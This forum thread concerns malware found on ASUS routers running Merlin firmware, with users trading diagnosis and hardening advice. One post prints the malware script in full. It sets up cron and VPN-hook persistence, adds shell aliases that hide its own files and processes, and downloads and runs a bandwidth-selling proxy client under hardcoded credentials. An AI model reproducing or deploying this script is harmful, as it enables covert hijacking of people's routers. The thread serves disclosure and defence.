Malware /jffs/updater script.

[alexYQR]

This seems concerning if no one knows where this came from and there has been multiple reports

 

[bennor]

What is this random /jffs/updater script?

Malware of some sort. There was another discussion last week about that malware:

Suspicious Activity?

I was running an ASUS RT-AC66U B1 router that this morning was having trouble connecting to the internet. I was receiving a warning that my ISP's DHCP does not function properly. I restarted the router and cable modem multiple times with the same result and also tried to manually update the...

www.snbforums.com

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.

 

[ATLga]

What is this random /jffs/updater script?

#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

* * * * * /jffs/updater #updater#

@RMerlin is this a default script?

Although I don't use it, I'm curious if you (or any of the others who've reported this that may be reading) had aiProtection turned on and if it alerted to anything. Also curious, same as the others, HOW this got on the router and agree that more details are needed about add-ons, open ports, vpns, etc.

 

[Viktor Jaep]

Malware of some sort. There was another discussion last week about that malware:

Suspicious Activity?

I was running an ASUS RT-AC66U B1 router that this morning was having trouble connecting to the internet. I was receiving a warning that my ISP's DHCP does not function properly. I restarted the router and cable modem multiple times with the same result and also tried to manually update the...

www.snbforums.com

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.

Another possible attack vector would be from a compromised machine or mobile device on the internal network that performed a network scan, and found a way to get onto the router. Unless there's an undisclosed vulnerability that allowed it to be copied/executed on the router, it may have been able to grab the router credentials somehow. It would be interesting to know if the username was still "admin", and whether the password was weak or not...

And I'm not finding anything online about this... Hmm.

 

[Viktor Jaep]

Malware of some sort. There was another discussion last week about that malware:

Suspicious Activity?

I was running an ASUS RT-AC66U B1 router that this morning was having trouble connecting to the internet. I was receiving a warning that my ISP's DHCP does not function properly. I restarted the router and cable modem multiple times with the same result and also tried to manually update the...

www.snbforums.com

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.

I agree with everything @bennor and @ATLga mentioned here, @Swistheater... would you be willing to give us any further details? I know you're probably going through a reset cycle at the moment... but when you come up for air!

PS. have you also done a sweep across your pc's, laptops, mobile devices as well to look for any possible intruders from that front?

 

[Adamm]

I've pushed v7.4.2 for Skynet which should detect and remove this malware (or cripple it at least).

 

[Tech9]

And I'm not finding anything online about this... Hmm.

@Swistheater created the script and asks for expert opinion before releasing it into the wild.

 

[Viktor Jaep]

@Swistheater created the script and asks for expert opinion before releasing it into the wild.

I guess I should execute it to see what things I can help suggest need fixing!

 

[Viktor Jaep]

I've pushed v7.4.2 for Skynet which should detect and remove this malware (or cripple it at least).

Fighting scripts with scripts... nice work, @Adamm

And yes... I was feverishly checking my syslog for this after it came back up... LOL

logger -st Skynet "[!] Warning! Router Malware Detected (/jffs/updater) - Investigate Immediately!"

 

[ColDen]

I also feel more secure now...

Thanks @Adamm

 

[Viktor Jaep]

I also feel more secure now...

It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS!

 

[ColDen]

It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS!

You are absolutly right

P.S: You are also one of them in my book.

 

[maxbraketorque]

It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS!

It is great, but unfortunately, 99% of ASUS router users will not see this.

 

[Swistheater]

Wow. Did you just happen to find this sitting under the /jffs folder after noticing wget commands? Were you watching htop? How did you find it?

First thing i noticed was abnormal CPU spikes. My CPU was thrashing and there was no network traffic taking place on my network that warrant the level of thrashing taking place.

 

[Swistheater]

It goes to show what an amazing community this is... As soon as a major potential threat is identified, people are pounding on this trying to figure out the cause/source, and others like @Adamm are building detections into their scripts to remove it, or at least hobble it. ON THE SAME DAY NO LESS!

Crazy that it was like that. I saw wget going across htop. From seeing the htop, I was able to determine the scripts location in jffs.

 

[Swistheater]

@Swistheater created the script and asks for expert opinion before releasing it into the wild.

I wish I was that skilled.

 

[Swistheater]

Malware of some sort. There was another discussion last week about that malware:

Suspicious Activity?

I was running an ASUS RT-AC66U B1 router that this morning was having trouble connecting to the internet. I was receiving a warning that my ISP's DHCP does not function properly. I restarted the router and cable modem multiple times with the same result and also tried to manually update the...

www.snbforums.com

The obvious question is how is this getting on the router?
Probably going to need more information posted by those affected; specific router, firmware, scripts, external ports open, external access, VPN usage, etc.
Those infected will want to double check all network devices for any sort of malware/spyware/virus infections. Disable any remote access. And change any WiFi passwords, router admin password, and any VPN usage passwords as well just in case.

Although I don't use it, I'm curious if you (or any of the others who've reported this that may be reading) had aiProtection turned on and if it alerted to anything. Also curious, same as the others, HOW this got on the router and agree that more details are needed about add-ons, open ports, vpns, etc.

The scripts I had installed are listed in the signature except @Viktor Jaep script VPNMON-R2 which I have not used in a few months since I canceled my VPN services. No ports were open. Remote access disabled. AiProtect was turned on, I forgot to save its history before nuking the router. VPN services have been turned off for the last three months. Script had a time stamp of May 2, 2023.

 

[drinkingbird]

Interesting subject, but how did this script end up on the router? Without user intervention, is it possible?

This link in the script points to Pawns.app (proxy service):

hxxps://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli

It seems to be a way to use internet bandwidth, explained here:

https://peppe8o.com/pawns-raspberry-pi-passive-income/

The email account, comes from this service (eg. also have vpn service):

https://proton.me/mail

Some versions of 384 code had a vulnerability that let people in from the WAN if you had WAN access enabled, even if they didn't have your password. Even on 386, they can brute force or try common passwords and get in. Seems to be botnets programmatically attacking Asus routers, in fact once your router is infected one of the functions is probably to find and attack other routers.

WAN http/https access should be disabled. Ideally SSH too. If you must have SSH enabled to the WAN I would not only have a very strong password but also restrict it to only a client key that you give yourself. Merlin also rate limits SSH failed logins so that helps protect against brute force, but I'd still restrict the key.

Vulnerabilities in VPN could also give someone access to your router.

 

[Swistheater]

Some versions of 384 code had a vulnerability that let people in from the WAN if you had WAN access enabled, even if they didn't have your password. Even on 386, they can brute force or try common passwords and get in. Seems to be botnets programmatically attacking Asus routers, in fact once your router is infected one of the functions is probably to find and attack other routers.

WAN http/https access should be disabled. Ideally SSH too. If you must have SSH enabled to the WAN I would not only have a very strong password but also restrict it to only a client key that you give yourself. Merlin also rate limits SSH failed logins so that helps protect against brute force, but I'd still restrict the key.

Vulnerabilities in VPN could also give someone access to your router.

The weird thing is I noticed an issue where the router would go for spells where my internet services kept getting interrupted. My AiMESH nodes kept experiencing heavy interference from the CPU throttling taking place everytime the WGET command ran. I really noticed the anomalous behaviors once I started noticing my nodes connections dropping in and out. I started inspecting the router at that point. I looked at HTOP to determine what culprit was causing the high CPU usage issue. I was expecting Diversion and DNSMASQ log, but nope it was a script running a wget command.

 

[thelonelycoder]

I was expecting Diversion and DNSMASQ log, but nope it was a script running a wget command.

FYI All wget and curl commands are auto-logged to /jffs/wglst and /jffs/curllst respectively.